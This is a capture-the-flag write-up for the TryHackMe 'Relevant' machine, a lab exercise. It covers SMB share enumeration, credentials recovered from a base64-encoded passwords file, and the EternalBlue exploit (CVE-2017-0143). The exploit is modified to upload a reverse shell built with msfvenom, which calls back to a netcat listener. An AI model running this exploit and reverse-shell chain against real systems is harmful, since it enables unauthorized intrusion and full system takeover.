TryHackMe — Relevant CTF Write-up

Relevant is a medium challenge from TryHackMe. There are some ways to complete this machine but in this write-up I will explain how to do that using a known vulnerability related to samba servers.
First, let’s start with Nmap to scan all ports. Here, we just need to run:
nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.61.45
I’ve set the options -T4
and --defeat-rst-ratelimit
to scan faster since I’m running Kali on a virtual machine with NAT but it’s not necessary.
As you can see below, this machine has a bunch of open ports. It’s interesting to notice that there is a HTTP server running on port 80 and what seems like a samba server. There are some other higher open ports, but I didn’t need to use any of them in order to get root, so let’s skip them.

Visiting the webserver we can see a Microsoft IIS default page:

I’ve tried to enumerate sub-directories with gobuster but didn’t find anything, so let’s just move on…
Next, let’s see what we can get from the samba server. Using smbclient, we just need to run the following command to try to enumerate the shares and leave empty the password field:
smbclient -L \\10.10.61.45\

Nice, we got it! There are some default shares but the nt4wrksv one may hide something interesting. We can try to connect to this share and see what we can get by running:
smbclient \\10.10.61.45\nt4wrksv
As you can see below, there is a file called passwords.txt:

After checking the file, we can see that there are two base64 encoded strings:

By decoding these strings, it seems like we could find the passwords for two users, Bill and Bob:

Nice! We got the users' credentials but what now? Let’s use Nmap again to run some vulnerability checks, so we can see if there is any vulnerable server. We can do this using the --script
parameter:
nmap -oA nmap-vuln -Pn -script vuln -p 80,135,139,445,3389 10.10.61.45

Nmap detected that the samba server is probably vulnerable to RCE due to the CVE-2017–0143. A quick search reveals that it is related to the EternalBlue exploit:

So, using searchsploit we can get the EternalBlue exploit:

Let’s use the second one — windows/remote/42315.py:
searchsploit -m windows/remote/42315.py

In order to run the exploit, we need to download the mysmb.py file, as mentioned at the beginning of the script. Also, we can set the username and password for a user.

Let’s use the credentials that we got before. Here I’m using Bob’s credentials because Bill’s didn’t work:

By reading the source code, it’s possible to notice that the smb_pwn
function creates a dummy file pwned.txt to test the vulnerability.

So we can modify it to upload and execute a reverse shell:

Our rshell.exe can be obtained using msfvenom. Let’s search by Windows reverse shell payloads by running:
msfvenom -l payloads | grep windows | grep reverse | grep shell

After choosing windows/shell_reverse_tcp we can see the parameters by running:
msfvenom -p windows/shell_reverse_tcp --list-options

We need to set the LHOST variable with the local machine IP. I chose the 4444 local port value (LPORT) but you can pick any other value. The format will be .exe because it will be executed on a windows machine. So the full command is:
msfvenom -p windows/shell_reverse_tcp LHOST=10.13.6.126 LPORT=4444 -f exe > rshell.exe

Before running the script, we need to start our local server. Using netcat, just type:
nc -lnvp 4444
Now run the script using the remote machine IP and you’ll get the following output:

Even though a few errors were shown, the overall task was performed successfully, giving us a shell with a privileged user:

Now we need to search for the flags, a good place to start is the Users folder, which holds two users, Bob and Administrator:

The user flag can be found in the desktop folder inside Bob’s directory:

And the root flag is found in the desktop folder inside Administrator’s directory:
